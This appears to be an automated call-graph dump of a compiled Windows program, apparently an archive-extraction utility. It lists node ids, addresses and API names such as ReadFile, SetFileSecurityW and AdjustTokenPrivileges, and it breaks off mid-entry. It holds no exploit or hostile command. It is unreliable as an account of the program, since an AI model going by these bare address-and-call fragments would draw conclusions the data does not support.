3 API calls 73502->73503 73505 3925d6 73502->73505 73503->73505 73504 39261f 73504->73467 73507 382fec 3 API calls 73504->73507 73505->73467 73505->73504 73643 3a1d73 5 API calls __EH_prolog 73505->73643 73509 39263f 73507->73509 73508 392611 _CxxThrowException 73508->73504 73644 38859e malloc _CxxThrowException free _CxxThrowException 73509->73644 73512 3a7b52 __EH_prolog 73511->73512 73700 3a7eec 73512->73700 73514 3a7ca4 73514->73312 73516 3830ea malloc _CxxThrowException free 73523 3a7b63 73516->73523 73517 382e04 malloc _CxxThrowException 73517->73523 73519 381e40 free ctype 73519->73523 73522 3c04d2 5 API calls 73522->73523 73523->73514 73523->73516 73523->73517 73523->73519 73523->73522 73526 3a7c61 memcpy 73523->73526 73705 3a70ea 73523->73705 73708 3a7a40 73523->73708 73726 3a7cc3 6 API calls 73523->73726 73727 3912a5 73523->73727 73732 38429a 73523->73732 73738 3a74eb malloc _CxxThrowException memcpy __EH_prolog ctype 73523->73738 73739 3a7193 73523->73739 73526->73523 73529 381fbd __EH_prolog 73528->73529 73757 3826dd 73529->73757 73535 381fed 73767 381e40 free 73535->73767 73537 381ff5 73768 381e40 free 73537->73768 73539 381ffd 73539->73303 73540->73314 73541->73320 73542->73319 73543->73329 73544->73329 73545->73329 73546->73326 73547->73330 73548->73345 73549->73345 73550->73345 73551->73345 73552->73345 73553->73345 73554->73345 73555->73335 73556->73344 73557->73344 73558->73344 73559->73344 73560->73344 73561->73340 73562->73346 73563->73346 73564->73346 73565->73346 73580->73388 73665 382f1c 73581->73665 73584 391f7e 73584->73397 73624 3a1d73 5 API calls __EH_prolog 73584->73624 73585 3929fe 73668 381e40 free 73585->73668 73587 392ab3 __EH_prolog 73586->73587 73598 392b0f 73587->73598 73672 382e8a 73587->73672 73590 3922ad 73590->73427 73590->73430 73592 392b04 73677 381e40 free 73592->73677 73593 392bc6 73682 3a1d73 5 API calls __EH_prolog 73593->73682 73596 392bd6 _CxxThrowException 73596->73590 73598->73590 73598->73593 73601 392b9f 73598->73601 73678 392cb4 48 API calls 2 library calls 73598->73678 73679 392bf5 8 API calls __EH_prolog 73598->73679 73680 392a61 malloc _CxxThrowException free _CxxThrowException memcpy 73598->73680 73601->73590 73681 3a1d73 5 API calls __EH_prolog 73601->73681 73603 392bb8 _CxxThrowException 73603->73593 73605 384fd2 73604->73605 73611 384fce 73604->73611 73683 3a7ebb 73605->73683 73608 385006 73608->73611 73688 381524 malloc _CxxThrowException __EH_prolog ctype 73608->73688 73609 384fe9 _CxxThrowException 73610 384ffe 73609->73610 73687 3c0551 malloc _CxxThrowException free memcpy ctype 73610->73687 73614 39384c 73611->73614 73617 393856 __EH_prolog 73614->73617 73615 382e04 malloc _CxxThrowException 73615->73617 73616 382fec 3 API calls 73616->73617 73617->73615 73617->73616 73618 382f88 3 API calls 73617->73618 73621 381e40 free ctype 73617->73621 73622 393917 73617->73622 73689 3c04d2 73617->73689 73695 393b76 malloc _CxxThrowException __EH_prolog ctype 73617->73695 73618->73617 73621->73617 73622->73438 73623->73395 73624->73401 73625->73408 73626->73410 73627->73413 73628->73414 73629->73421 73630->73419 73631->73428 73632->73436 73633->73474 73634->73474 73635->73477 73636->73469 73637->73482 73638->73481 73639->73488 73640->73494 73641->73500 73642->73502 73643->73508 73644->73467 73645->73451 73646->73447 73648 393a3b 73647->73648 73649 392722 73647->73649 73697 393bd9 free ctype 73648->73697 73649->73470 73649->73473 73651 393a42 73652 393a52 _CxxThrowException 73651->73652 73653 393a67 73651->73653 73654 393a6f 73651->73654 73652->73653 73698 3c0551 malloc _CxxThrowException free memcpy ctype 73653->73698 73654->73649 73699 393b76 malloc _CxxThrowException __EH_prolog ctype 73654->73699 73657->73470 73658->73484 73659->73496 73660->73499 73661->73495 73662->73465 73663->73453 73664->73460 73669 382ba6 73665->73669 73667 382f2c 73667->73585 73667->73667 73668->73584 73670 381e0c ctype 2 API calls 73669->73670 73671 382bbb 73670->73671 73671->73667 73673 382ea0 73672->73673 73674 382ba6 2 API calls 73673->73674 73675 382eaf 73674->73675 73676 392a61 malloc _CxxThrowException free _CxxThrowException memcpy 73675->73676 73676->73592 73677->73598 73678->73598 73679->73598 73680->73598 73681->73603 73682->73596 73684 384fd9 73683->73684 73686 3a7ec6 73683->73686 73684->73608 73684->73609 73684->73610 73685 381e40 free ctype 73685->73686 73686->73684 73686->73685 73687->73608 73688->73608 73690 3c04df 73689->73690 73691 3c0513 73689->73691 73692 3c04fd 73690->73692 73693 3c04e8 _CxxThrowException 73690->73693 73691->73617 73696 3c0551 malloc _CxxThrowException free memcpy ctype 73692->73696 73693->73692 73695->73617 73696->73691 73697->73651 73698->73654 73699->73654 73701 3a7ef7 73700->73701 73702 3a7f14 73700->73702 73701->73702 73703 3a7193 free 73701->73703 73747 381e40 free 73701->73747 73702->73523 73703->73701 73706 382e04 2 API calls 73705->73706 73707 3a7103 73706->73707 73707->73523 73709 3a7a4a __EH_prolog 73708->73709 73748 38361b 6 API calls 2 library calls 73709->73748 73711 3a7a78 73749 38361b 6 API calls 2 library calls 73711->73749 73713 3a7b20 73751 3b2db9 free ctype 73713->73751 73715 3a7b2b 73752 3b2db9 free ctype 73715->73752 73716 382e04 malloc _CxxThrowException 73718 3a7a83 73716->73718 73718->73713 73718->73716 73720 382fec 3 API calls 73718->73720 73721 382fec 3 API calls 73718->73721 73722 3c04d2 5 API calls 73718->73722 73725 381e40 free ctype 73718->73725 73750 3a7955 malloc _CxxThrowException __EH_prolog ctype 73718->73750 73719 3a7b37 73719->73523 73720->73718 73723 3a7aca wcscmp 73721->73723 73722->73718 73723->73718 73725->73718 73726->73523 73728 3c04d2 5 API calls 73727->73728 73729 3912ad 73728->73729 73730 381e0c ctype 2 API calls 73729->73730 73731 3912b4 73730->73731 73731->73523 73733 3842a7 73732->73733 73737 3842c5 73732->73737 73734 3842b3 73733->73734 73753 381e40 free 73733->73753 73736 381e0c ctype 2 API calls 73734->73736 73734->73737 73736->73737 73737->73523 73738->73523 73740 3a719d __EH_prolog 73739->73740 73754 3b2db9 free ctype 73740->73754 73742 3a71b3 73755 3a71d5 free __EH_prolog ctype 73742->73755 73744 3a71bf 73756 381e40 free 73744->73756 73746 3a71c7 73746->73523 73747->73701 73748->73711 73749->73718 73750->73718 73751->73715 73752->73719 73753->73734 73754->73742 73755->73744 73756->73746 73758 381e0c ctype 2 API calls 73757->73758 73759 381fcb 73758->73759 73760 382e47 73759->73760 73761 382e57 73760->73761 73762 382ba6 2 API calls 73761->73762 73763 381fda 73762->73763 73764 382010 73763->73764 73769 382033 73764->73769 73767->73537 73768->73539 73770 38203b 73769->73770 73771 382054 73770->73771 73772 382045 73770->73772 73777 3837ff 9 API calls 73771->73777 73776 38421e malloc _CxxThrowException free _CxxThrowException _CxxThrowException 73772->73776 73775 382022 fputs 73775->73535 73776->73775 73777->73775 73780 406bc6 73781 406bcd 73780->73781 73783 406bca 73780->73783 73782 406bd1 malloc 73781->73782 73781->73783 73782->73783 73784 3badb7 73785 3badc1 __EH_prolog 73784->73785 73786 3826dd 2 API calls 73785->73786 73787 3bae1d 73786->73787 73788 382e04 2 API calls 73787->73788 73789 3bae38 73788->73789 73790 382e04 2 API calls 73789->73790 73791 3bae44 73790->73791 73792 382e04 2 API calls 73791->73792 73793 3bae68 73792->73793 73800 3bad29 73793->73800 73797 3bae94 73798 382e04 2 API calls 73797->73798 73799 3baeb2 73798->73799 73801 3bad33 __EH_prolog 73800->73801 73802 382e04 2 API calls 73801->73802 73803 3bad5f 73802->73803 73804 382e04 2 API calls 73803->73804 73805 3bad72 73804->73805 73806 3baf2d 73805->73806 73807 3baf37 __EH_prolog 73806->73807 73818 3934f4 malloc _CxxThrowException __EH_prolog 73807->73818 73809 3bafac 73810 382e04 2 API calls 73809->73810 73811 3bafbb 73810->73811 73812 382e04 2 API calls 73811->73812 73813 3bafca 73812->73813 73814 382e04 2 API calls 73813->73814 73815 3bafd9 73814->73815 73816 382e04 2 API calls 73815->73816 73817 3bafe8 73816->73817 73817->73797 73818->73809 73819 3c8eb1 73824 3c8ed1 73819->73824 73823 3c8ec9 73825 3c8edb __EH_prolog 73824->73825 73833 3c9267 73825->73833 73829 3c8efd 73838 3be5f1 free ctype 73829->73838 73831 3c8eb9 73831->73823 73832 381e40 free 73831->73832 73832->73823 73834 3c9271 __EH_prolog 73833->73834 73839 381e40 free 73834->73839 73836 3c8ef1 73837 3c922b free CloseHandle GetLastError ctype 73836->73837 73837->73829 73838->73831 73839->73836 73840 3b5475 73841 382fec 3 API calls 73840->73841 73842 3b54b4 73841->73842 73845 3bc911 73842->73845 73844 3b54bb 73846 3bc92f 73845->73846 73847 3bc926 GetTickCount 73845->73847 73857 3bc96d 73846->73857 73875 3bcb64 73846->73875 73915 382ab1 strcmp 73846->73915 73847->73846 73851 3bc9ce 73851->73875 73898 3827bb 73851->73898 73852 3bc95b 73852->73857 73916 383542 wcscmp 73852->73916 73856 3bca0a 73859 38286d 5 API calls 73856->73859 73863 3bca21 73856->73863 73857->73875 73890 3bc86a 73857->73890 73858 3bc9e2 73858->73856 73918 38286d 73858->73918 73861 3bca16 73859->73861 73925 3828fa malloc _CxxThrowException free memcpy _CxxThrowException 73861->73925 73867 38286d 5 API calls 73863->73867 73884 3bcb10 73863->73884 73870 3bca40 73867->73870 73869 3bcb59 73930 3bcb92 malloc _CxxThrowException free 73869->73930 73871 382fec 3 API calls 73870->73871 73874 3bca4e 73871->73874 73881 382033 10 API calls 73874->73881 73875->73844 73877 3bcb49 73929 381f91 fflush 73877->73929 73878 3bcb50 73880 3827bb 3 API calls 73878->73880 73880->73869 73889 3bca6a 73881->73889 73882 3bcaf5 73928 3828fa malloc _CxxThrowException free memcpy _CxxThrowException 73882->73928 73904 3bcb74 73884->73904 73885 382fec 3 API calls 73885->73889 73888 382033 10 API calls 73888->73889 73889->73882 73889->73885 73889->73888 73926 383599 memmove 73889->73926 73927 383402 malloc _CxxThrowException free memmove _CxxThrowException 73889->73927 73891 3bc88c __aulldiv 73890->73891 73892 3bc8d3 strlen 73891->73892 73893 3bc8f1 73892->73893 73894 3bc900 73892->73894 73893->73894 73897 38286d 5 API calls 73893->73897 73895 3828a1 5 API calls 73894->73895 73896 3bc90c 73895->73896 73896->73851 73917 382ab1 strcmp 73896->73917 73897->73893 73899 3827c7 73898->73899 73903 3827e3 73898->73903 73900 381e0c ctype 2 API calls 73899->73900 73899->73903 73901 3827da 73900->73901 73931 381e40 free 73901->73931 73903->73858 73905 3bcb1c 73904->73905 73906 3bcb7c strcmp 73904->73906 73905->73869 73907 3bc7d7 73905->73907 73906->73905 73908 3bc849 73907->73908 73910 3bc7ea 73907->73910 73911 3bc85a fputs 73908->73911 73933 381f91 fflush 73908->73933 73909 3bc7fe fputs 73909->73908 73910->73909 73932 3825cb malloc _CxxThrowException free _CxxThrowException ctype 73910->73932 73911->73877 73911->73878 73915->73852 73916->73857 73917->73851 73934 381e9d 73918->73934 73921 3828a1 73922 3828b0 73921->73922 73939 38267f 73922->73939 73924 3828bf 73924->73856 73925->73863 73926->73889 73927->73889 73928->73884 73929->73878 73930->73875 73931->73903 73932->73909 73933->73911 73935 381ea8 73934->73935 73936 381ead 73934->73936 73938 38263c malloc _CxxThrowException free memcpy _CxxThrowException 73935->73938 73936->73921 73938->73936 73940 3826c2 73939->73940 73941 382693 73939->73941 73940->73924 73942 3826c8 _CxxThrowException 73941->73942 73943 3826bc 73941->73943 73944 3826dd 73942->73944 73948 382595 malloc _CxxThrowException free memcpy ctype 73943->73948 73946 381e0c ctype 2 API calls 73944->73946 73947 3826ea 73946->73947 73947->73924 73948->73940 73950 4069d0 73951 4069d4 73950->73951 73952 4069d7 malloc 73950->73952 73953 391368 73955 39136d 73953->73955 73956 39138c 73955->73956 73959 417d80 WaitForSingleObject 73955->73959 73962 3bf745 73955->73962 73966 417ea0 SetEvent GetLastError 73955->73966 73960 417d98 73959->73960 73961 417d8e GetLastError 73959->73961 73960->73955 73961->73960 73963 3bf74f __EH_prolog 73962->73963 73967 3bf784 73963->73967 73965 3bf765 73965->73955 73966->73955 73968 3bf78e __EH_prolog 73967->73968 73976 3912d4 73968->73976 73971 3912d4 4 API calls 73972 3bf7d4 73971->73972 73973 3bf871 73972->73973 73984 38c4d6 73972->73984 73990 406b23 VirtualAlloc 73972->73990 73973->73965 73977 391327 73976->73977 73978 3912e7 73976->73978 73977->73971 73979 3912ef _CxxThrowException 73978->73979 73980 391304 73978->73980 73979->73980 73991 381e40 free 73980->73991 73982 39130b 73983 381e0c ctype 2 API calls 73982->73983 73983->73977 73988 38c4e9 73984->73988 73985 38c6f3 73985->73973 73988->73985 73989 38c695 memmove 73988->73989 73992 39111c 73988->73992 73997 3911b4 73988->73997 73989->73988 73990->73973 73991->73982 73994 391130 73992->73994 73993 39115f 73993->73988 73994->73993 74002 38b668 73994->74002 74021 38d331 73994->74021 73999 3911c1 73997->73999 73998 3911eb 73998->73988 73999->73998 74042 3caf27 73999->74042 74049 3cae7c 73999->74049 74018 38b675 74002->74018 74005 38b8aa GetLastError 74010 38b6aa 74005->74010 74006 38b81b 74009 38b839 memcpy 74006->74009 74006->74010 74008 38b7e7 74012 387731 5 API calls 74008->74012 74019 38b864 74008->74019 74009->74010 74010->73994 74011 38b811 74039 38b8ec GetLastError 74011->74039 74014 38b80d 74012->74014 74013 38b7ad 74013->74018 74020 38b8c7 74013->74020 74037 406a20 VirtualAlloc 74013->74037 74014->74011 74014->74019 74018->74006 74018->74008 74018->74010 74018->74011 74018->74013 74018->74019 74029 387731 74018->74029 74038 387b4f ReadFile 74018->74038 74025 387b7c 74019->74025 74020->74010 74022 38d355 74021->74022 74023 38d374 74022->74023 74024 38b668 10 API calls 74022->74024 74023->73994 74024->74023 74026 387b89 74025->74026 74040 387b4f ReadFile 74026->74040 74028 387b9a 74028->74005 74028->74010 74030 38775c SetFilePointer 74029->74030 74032 387740 74029->74032 74031 387780 GetLastError 74030->74031 74034 3877a1 74030->74034 74033 38778c 74031->74033 74031->74034 74032->74030 74041 3876d6 SetFilePointer GetLastError 74033->74041 74034->74018 74036 387796 SetLastError 74036->74034 74037->74013 74038->74018 74039->74010 74040->74028 74041->74036 74045 3caf36 74042->74045 74043 3cb010 74043->73999 74044 3caeeb 107 API calls 74044->74045 74045->74043 74045->74044 74054 38bd0c 74045->74054 74059 3cad3a 74045->74059 74063 3caebf 107 API calls 74045->74063 74050 3cae86 74049->74050 74052 397140 7 API calls 74050->74052 74667 397190 74050->74667 74051 3caebb 74051->73999 74052->74051 74064 387ca2 74054->74064 74057 38bd3d 74057->74045 74060 3cad44 __EH_prolog 74059->74060 74072 396305 74060->74072 74061 3cadbf 74061->74045 74063->74045 74066 387caf 74064->74066 74067 387cdb 74066->74067 74069 387c68 74066->74069 74067->74057 74068 38b8ec GetLastError 74067->74068 74068->74057 74070 387c79 WriteFile 74069->74070 74071 387c76 74069->74071 74070->74066 74071->74070 74073 39630f __EH_prolog 74072->74073 74109 3962b9 74073->74109 74076 396427 74078 38965d VariantClear 74076->74078 74077 39644a 74113 38965d 74077->74113 74101 396445 74078->74101 74088 3965de 74089 39669e 74088->74089 74090 3965e7 74088->74090 74096 3966b8 74089->74096 74097 396754 74089->74097 74089->74101 74094 381e0c ctype 2 API calls 74090->74094 74095 3965f6 74090->74095 74091 3964da 74091->74088 74091->74101 74278 39789c free memmove ctype 74091->74278 74094->74095 74279 3a36ea 74095->74279 74100 381e0c ctype 2 API calls 74096->74100 74166 395bea 74097->74166 74099 39666b 74292 381e40 free 74099->74292 74100->74101 74101->74061 74102 3964ca 74102->74091 74102->74101 74277 3842e3 CharUpperW 74102->74277 74103 39665c 74291 3831e5 malloc _CxxThrowException free _CxxThrowException 74103->74291 74110 3962c9 74109->74110 74293 3a8fa4 74110->74293 74114 389685 74113->74114 74115 389665 74113->74115 74117 395126 74114->74117 74115->74114 74116 38967e VariantClear 74115->74116 74116->74114 74118 395130 __EH_prolog 74117->74118 74119 3951b4 74118->74119 74125 39518e 74118->74125 74337 383097 malloc _CxxThrowException free SysStringLen ctype 74118->74337 74122 38965d VariantClear 74119->74122 74119->74125 74121 38965d VariantClear 74123 39527f 74121->74123 74124 3951bc 74122->74124 74123->74101 74159 3a8b05 74123->74159 74124->74125 74126 395289 74124->74126 74127 395206 74124->74127 74125->74121 74126->74125 74129 395221 74126->74129 74338 383097 malloc _CxxThrowException free SysStringLen ctype 74127->74338 74130 38965d VariantClear 74129->74130 74131 39522d 74130->74131 74131->74123 74132 395351 74131->74132 74339 395459 malloc _CxxThrowException __EH_prolog 74131->74339 74132->74123 74139 3953a1 74132->74139 74344 3835e7 memmove 74132->74344 74135 3952ba 74340 388011 5 API calls ctype 74135->74340 74137 3952cf 74153 3952fd 74137->74153 74341 38823d 10 API calls 2 library calls 74137->74341 74139->74123 74345 3843b7 5 API calls 2 library calls 74139->74345 74142 3952e5 74143 382fec 3 API calls 74142->74143 74146 3952f5 74143->74146 74144 39540e 74347 39789c free memmove ctype 74144->74347 74145 3953df 74145->74144 74150 39541c 74145->74150 74346 3842e3 CharUpperW 74145->74346 74342 381e40 free 74146->74342 74151 3a36ea 5 API calls 74150->74151 74152 395427 74151->74152 74154 382fec 3 API calls 74152->74154 74343 3954a0 free ctype 74153->74343 74155 395433 74154->74155 74348 381e40 free 74155->74348 74157 39543b 74349 3b2db9 free ctype 74157->74349 74160 3a8b2e 74159->74160 74161 38965d VariantClear 74160->74161 74162 39648a 74161->74162 74162->74101 74163 394d78 74162->74163 74350 3a9262 74163->74350 74167 395bf4 __EH_prolog 74166->74167 74357 3954c0 74167->74357 74170 3a8b05 VariantClear 74171 395c34 74170->74171 74224 395e17 74171->74224 74372 395630 74171->74372 74174 3a36ea 5 API calls 74175 395c51 74174->74175 74176 395c60 74175->74176 74477 3957c1 53 API calls 2 library calls 74175->74477 74178 382f1c 2 API calls 74176->74178 74179 395c6c 74178->74179 74224->74101 74276 395110 9 API calls 74276->74102 74277->74102 74278->74088 74280 3a36f4 __EH_prolog 74279->74280 74281 382e04 2 API calls 74280->74281 74282 3a370a 74281->74282 74283 3a3736 74282->74283 74665 381089 malloc _CxxThrowException free _CxxThrowException 74282->74665 74666 3831e5 malloc _CxxThrowException free _CxxThrowException 74282->74666 74284 382f1c 2 API calls 74283->74284 74287 3a3742 74284->74287 74664 381e40 free 74287->74664 74289 396633 74289->74099 74289->74103 74290 381089 malloc _CxxThrowException free _CxxThrowException 74289->74290 74290->74103 74291->74099 74292->74101 74294 3a8fae __EH_prolog 74293->74294 74295 3a7ebb free 74294->74295 74296 3a8ff2 74295->74296 74327 3a8b64 74296->74327 74300 3a9020 74301 382fec 3 API calls 74300->74301 74309 396302 74300->74309 74302 3a903a 74301->74302 74315 3a904d 74302->74315 74331 3a8b80 VariantClear 74302->74331 74304 3a91b0 74334 3a8b9c 10 API calls 2 library calls 74304->74334 74305 3a9244 74336 3843b7 5 API calls 2 library calls 74305->74336 74306 3a9144 74310 382f88 3 API calls 74306->74310 74313 3a917b 74306->74313 74309->74076 74309->74077 74309->74101 74310->74313 74311 3a9100 74314 38965d VariantClear 74311->74314 74312 3a90d6 74312->74311 74316 3a90e7 74312->74316 74333 3a8f2e 9 API calls 74312->74333 74313->74304 74313->74305 74314->74309 74315->74306 74315->74309 74315->74311 74315->74312 74332 383097 malloc _CxxThrowException free SysStringLen ctype 74315->74332 74322 38965d VariantClear 74316->74322 74317 3a91c0 74317->74309 74320 382f88 3 API calls 74317->74320 74324 3a91ff 74320->74324 74321 3a9112 74321->74311 74323 3a8b64 VariantClear 74321->74323 74322->74306 74325 3a9123 74323->74325 74324->74309 74335 3850ff free ctype 74324->74335 74325->74311 74325->74316 74328 3a8b05 VariantClear 74327->74328 74329 3a8b6f 74328->74329 74329->74309 74330 3a8f2e 9 API calls 74329->74330 74330->74300 74331->74315 74332->74312 74333->74321 74334->74317 74335->74309 74336->74309 74337->74119 74338->74129 74339->74135 74340->74137 74341->74142 74342->74153 74343->74132 74344->74132 74345->74145 74346->74145 74347->74150 74348->74157 74349->74123 74351 3a926c __EH_prolog 74350->74351 74352 3a92fc 74351->74352 74356 3a92a4 74351->74356 74353 38965d VariantClear 74352->74353 74355 394d91 74353->74355 74354 38965d VariantClear 74354->74355 74355->74101 74355->74102 74355->74276 74356->74354 74358 3954ca __EH_prolog 74357->74358 74360 38965d VariantClear 74358->74360 74362 395507 74358->74362 74359 38965d VariantClear 74361 395567 74359->74361 74363 395528 74360->74363 74361->74170 74361->74224 74362->74359 74363->74362 74364 395572 74363->74364 74365 38965d VariantClear 74364->74365 74366 39558e 74365->74366 74506 394cac VariantClear __EH_prolog 74366->74506 74368 3955a1 74368->74361 74507 394cac VariantClear __EH_prolog 74368->74507 74370 3955b8 74370->74361 74508 394cac VariantClear __EH_prolog 74370->74508 74373 39563a __EH_prolog 74372->74373 74376 395679 74373->74376 74509 3a3558 10 API calls 2 library calls 74373->74509 74375 39571a 74375->74174 74376->74375 74377 382f1c 2 API calls 74376->74377 74378 395696 74377->74378 74510 3a3333 malloc _CxxThrowException free 74378->74510 74380 3956a2 74381 3956ad 74380->74381 74382 3956c5 74380->74382 74511 397853 5 API calls 2 library calls 74381->74511 74383 3956b4 74382->74383 74512 384adf wcscmp 74382->74512 74477->74176 74506->74368 74507->74370 74508->74361 74509->74376 74510->74380 74511->74383 74664->74289 74665->74282 74666->74282 74668 39719a __EH_prolog 74667->74668 74669 3971b0 74668->74669 74673 3971dd 74668->74673 74670 394d78 VariantClear 74669->74670 74672 3971b7 74670->74672 74672->74051 74680 396fc5 74673->74680 74674 3972b4 74675 394d78 VariantClear 74674->74675 74676 3972c0 74674->74676 74675->74676 74676->74672 74677 397140 7 API calls 74676->74677 74677->74672 74678 397236 74678->74672 74678->74674 74679 3972a3 SetFileSecurityW 74678->74679 74679->74674 74681 396fcf __EH_prolog 74680->74681 74706 3944a6 74681->74706 74683 39706a 74709 3968ac 74683->74709 74688 39709e 74733 381e40 free 74688->74733 74689 397051 74689->74683 74694 3911b4 107 API calls 74689->74694 74690 397029 74690->74683 74728 394dff 7 API calls 2 library calls 74690->74728 74693 3970c0 74729 386096 15 API calls 2 library calls 74693->74729 74694->74683 74695 39712e 74695->74678 74697 3970e2 74702 3970e6 74697->74702 74731 396b5e 69 API calls 2 library calls 74697->74731 74698 3970d1 74698->74697 74730 394dff 7 API calls 2 library calls 74698->74730 74701 3970fd 74701->74702 74703 397103 74701->74703 74702->74688 74732 381e40 free 74703->74732 74705 39710b 74705->74695 74707 382e04 2 API calls 74706->74707 74708 3944be 74707->74708 74708->74683 74708->74690 74727 396e71 12 API calls 2 library calls 74708->74727 74710 3968b6 __EH_prolog 74709->74710 74711 396921 74710->74711 74713 387d4b 6 API calls 74710->74713 74724 3968c5 74710->74724 74712 396962 74711->74712 74715 396998 74711->74715 74736 396a17 6 API calls 2 library calls 74711->74736 74712->74715 74737 382dcd malloc _CxxThrowException 74712->74737 74718 396906 74713->74718 74714 3969e1 74740 38bcf8 CloseHandle 74714->74740 74715->74714 74734 387c3b SetFileTime 74715->74734 74718->74711 74735 394dff 7 API calls 2 library calls 74718->74735 74721 39697a 74738 396b09 13 API calls __EH_prolog 74721->74738 74724->74688 74724->74693 74725 39698c 74739 381e40 free 74725->74739 74727->74690 74728->74689 74729->74698 74730->74697 74731->74701 74732->74705 74733->74695 74734->74714 74735->74711 74736->74712 74737->74721 74738->74725 74739->74715 74740->74724 74741 3ba42c 74742 3ba449 74741->74742 74743 3ba435 fputs 74741->74743 74900 3b545d 74742->74900 74899 381fa0 fputc 74743->74899 74747 382e04 2 API calls 74748 3ba4a1 74747->74748 74904 3a1858 74748->74904 74750 3ba4c9 74966 381e40 free 74750->74966 74752 3ba4d8 74753 3ba4ee 74752->74753 74755 3bc7d7 ctype 6 API calls 74752->74755 74754 3ba50e 74753->74754 74967 3b57fb 74753->74967 74977 3bc73e 74754->74977 74755->74753 74759 3baae5 75132 3b2db9 free ctype 74759->75132 74761 3bac17 75133 3b2db9 free ctype 74761->75133 74762 381e0c ctype 2 API calls 74764 3ba53a 74762->74764 74766 3ba54d 74764->74766 75103 3bb0fa malloc _CxxThrowException __EH_prolog 74764->75103 74765 3bac23 74767 3bac3a 74765->74767 74769 3bac35 74765->74769 74772 382fec 3 API calls 74766->74772 75135 3bb96d _CxxThrowException 74767->75135 75134 3bb988 33 API calls __aulldiv 74769->75134 74771 3bac42 75136 381e40 free 74771->75136 74778 3ba586 74772->74778 74775 3bac4d 74776 3a3247 free 74775->74776 74777 3bac5d 74776->74777 75137 381e40 free 74777->75137 74995 3bad06 74778->74995 74782 3bac7d 75138 3811c2 free __EH_prolog ctype 74782->75138 74786 3bac89 75139 3bbe0c free __EH_prolog ctype 74786->75139 74787 393a29 5 API calls 74789 3ba62e 74787->74789 74791 382e04 2 API calls 74789->74791 74790 3bac98 75140 3b2db9 free ctype 74790->75140 74792 3ba636 74791->74792 75003 3a4345 74792->75003 74899->74742 74901 3b5473 74900->74901 74902 3b5466 74900->74902 74901->74747 75141 38275e malloc _CxxThrowException free ctype 74902->75141 74905 3a1862 __EH_prolog 74904->74905 75142 3a021a 74905->75142 74910 3a18b9 75156 3a1aa5 free __EH_prolog ctype 74910->75156 74912 3a1935 75161 3a1aa5 free __EH_prolog ctype 74912->75161 74913 3a18c7 75157 3b2db9 free ctype 74913->75157 74916 3a1944 74937 3a1966 74916->74937 75162 3a1d73 5 API calls __EH_prolog 74916->75162 74918 3a18d3 74918->74750 74920 3c04d2 5 API calls 74926 3a18db 74920->74926 74921 3a1958 _CxxThrowException 74921->74937 74922 3a19be 75169 3af1f1 malloc _CxxThrowException free _CxxThrowException 74922->75169 74925 382e04 2 API calls 74925->74937 74926->74912 74926->74920 75158 3a0144 malloc _CxxThrowException free _CxxThrowException 74926->75158 75159 381524 malloc _CxxThrowException __EH_prolog ctype 74926->75159 75160 381e40 free 74926->75160 74928 3a19d6 74929 3a7ebb free 74928->74929 74931 3a19e1 74929->74931 74933 3912d4 4 API calls 74931->74933 74932 3c04d2 5 API calls 74932->74937 74934 3a19ea 74933->74934 74936 3a7ebb free 74934->74936 74938 3a19f7 74936->74938 74937->74922 74937->74925 74937->74932 75163 38631f 74937->75163 75167 381524 malloc _CxxThrowException __EH_prolog ctype 74937->75167 75168 381e40 free 74937->75168 74939 3912d4 4 API calls 74938->74939 74948 3a19ff 74939->74948 74941 3a1a4f 75171 381e40 free 74941->75171 74942 381524 malloc _CxxThrowException 74942->74948 74944 3a1a57 75172 3b2db9 free ctype 74944->75172 74946 3a1a64 75173 3b2db9 free ctype 74946->75173 74948->74941 74948->74942 74950 3a1a83 74948->74950 75170 3842e3 CharUpperW 74948->75170 75174 3a1d73 5 API calls __EH_prolog 74950->75174 74952 3a1a97 _CxxThrowException 74953 3a1aa5 __EH_prolog 74952->74953 75175 381e40 free 74953->75175 74955 3a1ac8 75176 3a02e8 free ctype 74955->75176 74957 3a1ad1 75177 3a1eab free __EH_prolog ctype 74957->75177 74959 3a1add 75178 381e40 free 74959->75178 74961 3a1ae5 75179 381e40 free 74961->75179 74963 3a1aed 75180 3b2db9 free ctype 74963->75180 74965 3a1afa 74965->74750 74966->74752 74968 3b5805 __EH_prolog 74967->74968 74969 3826dd 2 API calls 74968->74969 74976 3b5847 74968->74976 74970 3b5819 74969->74970 75360 3b5678 74970->75360 74974 3b583f 75377 381e40 free 74974->75377 74976->74754 74978 3bc748 __EH_prolog 74977->74978 74979 3bc7d7 ctype 6 API calls 74978->74979 74980 3bc75d 74979->74980 75394 381e40 free 74980->75394 74982 3bc768 75395 3a2c0b 74982->75395 74986 3bc77d 75401 381e40 free 74986->75401 74988 3bc785 75402 381e40 free 74988->75402 74990 3bc78d 75403 381e40 free 74990->75403 74992 3bc795 74993 3a2c0b ctype free 74992->74993 74994 3ba51d 74993->74994 74994->74759 74994->74762 74996 3bad29 2 API calls 74995->74996 74997 3ba5d8 74996->74997 74998 3bbf3e 74997->74998 74999 382fec 3 API calls 74998->74999 75000 3bbf85 74999->75000 75001 382fec 3 API calls 75000->75001 75002 3ba5ee 75001->75002 75002->74787 75004 3a434f __EH_prolog 75003->75004 75103->74766 75132->74761 75133->74765 75134->74767 75135->74771 75136->74775 75137->74782 75138->74786 75139->74790 75141->74901 75143 3a0224 __EH_prolog 75142->75143 75181 393d66 75143->75181 75146 3a062e 75152 3a0638 __EH_prolog 75146->75152 75147 3a06de 75268 3a019a malloc _CxxThrowException free memcpy 75147->75268 75149 3a06e6 75269 3a1453 26 API calls 2 library calls 75149->75269 75151 3a06ee 75151->74910 75151->74926 75152->75147 75152->75151 75153 3a01bc malloc _CxxThrowException free _CxxThrowException memcpy 75152->75153 75197 3a0703 75152->75197 75267 3b2db9 free ctype 75152->75267 75153->75152 75156->74913 75157->74918 75158->74926 75159->74926 75160->74926 75161->74916 75162->74921 75164 389245 75163->75164 75308 3890da 75164->75308 75167->74937 75168->74937 75169->74928 75170->74948 75171->74944 75172->74946 75173->74918 75174->74952 75175->74955 75176->74957 75177->74959 75178->74961 75179->74963 75180->74965 75192 41fb10 75181->75192 75183 393d70 GetCurrentProcess 75193 393e04 75183->75193 75185 393d8d OpenProcessToken 75186 393d9e LookupPrivilegeValueW 75185->75186 75187 393de3 75185->75187 75186->75187 75188 393dc0 AdjustTokenPrivileges 75186->75188 75189 393e04 CloseHandle 75187->75189 75188->75187 75190 393dd5 GetLastError 75188->75190 75191 393def 75189->75191 75190->75187 75191->75146 75192->75183 75194 393e0d 75193->75194 75195 393e11 CloseHandle 75193->75195 75194->75185 75196 393e21 75195->75196 75196->75185 75265 3a070d __EH_prolog 75197->75265 75198 3a0b40 75198->75152 75199 